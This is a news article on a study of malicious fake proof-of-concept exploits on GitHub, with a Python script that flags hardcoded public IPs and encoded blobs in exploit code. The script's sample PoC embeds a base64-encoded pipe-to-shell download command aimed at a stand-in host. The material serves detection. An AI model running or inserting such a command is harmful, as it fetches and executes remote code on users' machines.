Malicious code found inside exploits hosted on GitHub


The way malicious code is delivered keeps evolving, reusing old methods and refining how victims are deceived.

The Trojan horse idea apparently remains useful today, and in forms so subtle that many of us do not notice them. Recently, researchers at Leiden University (Netherlands) studied the problem of fake proof-of-concept exploits being published on GitHub.

The idea is to use these fake exploits to attack knowledgeable users who want to test and learn how a given vulnerability can be exploited with the tools provided, which makes this type of scenario ideal for slipping malicious code in to attack those users.

According to the study, a total of 47,313 exploit repositories were analyzed, covering known vulnerabilities identified between 2017 and 2021. The analysis of the exploits showed that 4,893 (10.3%) of them contained code performing malicious actions.

That is why users who decide to use published exploits are advised to examine them first, looking for suspicious insertions, and to run exploits only on virtual machines isolated from the main system.

Proofs of concept (PoC) for known vulnerabilities are widely shared in the security community. They help security analysts learn from each other and carry out security assessments and network red teaming.

In recent years it has become quite popular to distribute PoCs, for example through websites and platforms, as well as through public code repositories such as GitHub. However, public code repositories provide no guarantee that any given PoC comes from a trustworthy source, or that it even does what it is supposed to do.

In this paper, we investigate PoCs shared on GitHub for known vulnerabilities discovered in 2017–2021. We found that not all PoCs are trustworthy.

Regarding the problem, two main categories of malicious exploits were identified: exploits that contain malicious code, for example to open a backdoor on the system, download a Trojan, or connect the machine to a botnet; and exploits that collect and send sensitive information about the user.

In addition, a separate category of harmless fake exploits was identified: these do not perform malicious actions, but they also do not contain the expected functionality; for example, they are built to trick or to warn users who run unverified code from the network.

Some proofs of concept are fake (i.e. they do not actually provide PoC functionality), or even malicious: for example, they try to exfiltrate data from the system they are run on, or they try to install malware on that system.

To address this issue, we propose an approach to detect whether a PoC is malicious. Our approach is based on detecting the symptoms we observed in the collected dataset, for example, calls to malicious IP addresses, encoded code, or included trojanized binaries.

Using this approach, we discovered 4,893 malicious repositories out of the 47,313 repositories downloaded and verified (i.e., 10.3% of the studied repositories contain malicious code). This figure shows a worrying prevalence of dangerous malicious PoCs among the exploit code distributed on GitHub.

Several checks were used to detect malicious exploits:

  • The exploit code was analyzed for hardcoded public IP addresses, after which the identified addresses were further checked against blocklist databases of hosts used for botnet control and malware distribution.
  • Exploits provided in compiled form were checked with antivirus software.
  • The presence of atypical hexadecimal dumps or base64-encoded insertions in the code was detected, after which the insertions were decoded and studied.
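As an added illustration of the first and third checks (not the study's own tooling), the following Python triage pass looks for hardcoded public IPv4 addresses, decodes long base64 and `\x`-escaped hex runs, and rescans the decoded content for hidden hosts. The blocklist, the sample PoC fragment and the RFC 5737 documentation address in it are constructed placeholders; antivirus scanning of compiled exploits is out of scope here.

```python
import base64
import ipaddress
import re

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/])")
HEX_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){16,}")

# Non-routable ranges a PoC may legitimately reference (lab targets, localhost).
PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "0.0.0.0/8", "224.0.0.0/3")]
# Constructed placeholder; a real triage would query a threat-intel blocklist.
BLOCKLIST = {"203.0.113.77"}

def decode_blobs(src):
    """Decode long base64 runs and \\x-escaped hex runs so their content can be read."""
    blobs = []
    for m in B64_RE.findall(src):
        try:
            blobs.append(("base64", base64.b64decode(m, validate=True)))
        except ValueError:  # binascii.Error is a ValueError: not real base64
            pass
    for m in HEX_RE.findall(src):
        blobs.append(("hex", bytes.fromhex(m.replace("\\x", ""))))
    return blobs

def public_ips(text):
    """Return hard-coded IPv4 addresses outside the private/reserved ranges above."""
    found = set()
    for m in IPV4_RE.findall(text):
        try:
            ip = ipaddress.ip_address(m)
        except ValueError:  # e.g. 999.1.1.1 matched the regex but is not an address
            continue
        if not any(ip in n for n in PRIVATE_NETS):
            found.add(str(ip))
    return sorted(found)

def triage(src):
    """Apply the symptom checks; decoded blobs are rescanned for hidden hosts."""
    blobs = decode_blobs(src)
    text = src + "\n" + "\n".join(b.decode("latin-1") for _, b in blobs)
    ips = public_ips(text)
    hits = [ip for ip in ips if ip in BLOCKLIST]
    return {"public_ips": ips, "blocklisted": hits, "blobs": blobs,
            "suspicious": bool(blobs) or bool(hits)}

# Constructed sample PoC fragment: a lab IP (noise), a NOP-sled style hex dump and a
# base64 blob hiding a download-and-run command aimed at a documentation-range host.
SAMPLE_POC = ('TARGET = "10.0.0.5"\n' + 'buf = "' + "\\x90" * 24 + '"\n'
              + 'exec(base64.b64decode("'
              + base64.b64encode(b"curl -s http://203.0.113.77/run.sh | sh").decode()
              + '"))\n')
```

A hit on any of the three symptoms only flags a repository for manual review; the study's numbers came from verifying flagged repositories, not from the heuristics alone.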

Users who like to run their own tests are also advised to prefer sources such as Exploit-DB, since these attempt to verify the functionality and legitimacy of PoCs, whereas public code on platforms such as GitHub goes through no exploit verification process at all.

Finally, if you are interested in learning more about it, you can consult the details of the study in the following file, whose link I share.
